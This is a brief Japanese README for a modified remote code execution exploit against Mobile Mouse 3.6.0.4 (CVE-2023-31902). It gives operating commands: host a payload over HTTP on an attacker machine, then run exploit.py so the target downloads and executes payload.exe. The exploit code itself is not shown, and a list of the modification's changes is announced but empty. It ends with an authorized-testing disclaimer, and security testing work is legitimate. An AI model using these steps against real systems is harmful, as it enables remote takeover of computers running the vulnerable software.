
Mobile Mouse 3.6.0.4 - リモートコード実行 - CVE-2023-31902
Mobile Mouse 3.6.0.4 のリモートコード実行エクスプロイトの修正版で、EDB-51010 として公開されています。
元のエクスプロイトはペイロードのダウンロードには成功しますが、両方のステージが同じ TCP 接続を使用するため、実行に失敗する可能性があります。
この修正版では以下の処理を行います:
また、sendall() の使用、Windows パスの適切なエスケープ、ソケットタイムアウト、基本的なエラーハンドリングも備えています。
ペイロードディレクトリで HTTP サーバーを起動します:
python3 -m http.server 8080
エクスプロイトを実行します:
python3 exploit.py \
--target 192.168.1.50 \
--lhost 192.168.1.10 \
--file payload.exe
このプロジェクトは、許可されたセキュリティテストおよび教育目的の研究のみを対象としています。明示的な許可なくシステムに対して使用しないでください。